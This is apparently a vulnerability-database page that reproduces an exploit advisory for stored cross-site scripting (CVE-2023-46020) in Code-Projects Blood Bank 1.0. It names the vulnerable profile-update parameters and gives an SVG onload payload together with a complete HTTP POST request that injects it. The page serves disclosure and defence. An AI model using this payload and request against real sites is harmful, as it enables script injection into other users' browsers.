Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormErsin ErenlerPACKETSTORM:177879
HistoryApr 02, 2024 - 12:00 a.m.

Blood Bank 1.0 Cross Site Scripting

2024-04-0200:00:00
Ersin Erenler
packetstormsecurity.com
33
cross-site scripting
blood bank
code-projects
input validation
sanitation
user profile
burp suite
payload
apache
php

7.1 High

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

17.1%

JSON
`# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)  
# Date: 2023-11-14  
# Exploit Author: Ersin Erenler  
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code  
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip  
# Version: 1.0  
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0  
# CVE : CVE-2023-46020  
  
-------------------------------------------------------------------------------  
  
# Description:  
  
The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.  
  
Vulnerable File: updateprofile.php  
  
Parameters: rename, remail, rphone, rcity  
  
# Proof of Concept:  
----------------------  
  
1. Intercept the POST request to updateprofile.php via Burp Suite  
2. Inject the payload to the vulnerable parameters  
3. Payload: "><svg/onload=alert(document.domain)>  
4. Example request for rname parameter:  
  
---  
  
POST /bloodbank/file/updateprofile.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 103  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/bloodbank/rprofile.php?id=1  
Cookie: PHPSESSID=<some-cookie-value>  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update  
  
----  
  
5. Go to the profile page and trigger the XSS  
  
XSS Payload:  
  
"><svg/onload=alert(document.domain)>  
  
`

Related

nvd 1
prion 1
cvelist 1
cve 1
exploitdb 1
nvd
nvd
CVE-2023-46020
2023-11-13 23:15:07
prion
prion
Cross site scripting
2023-11-13 23:15:00
cvelist
cvelist
CVE-2023-46020
2023-11-13 00:00:00
cve
cve
CVE-2023-46020
2023-11-13 23:15:07
exploitdb
exploitdb
Blood Bank v1.0 - Stored Cross Site Scripting (XSS)
2024-04-02 00:00:00

7.1 High

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

17.1%

JSON
Related for PACKETSTORM:177879
nvd1prion1cvelist1cve1exploitdb1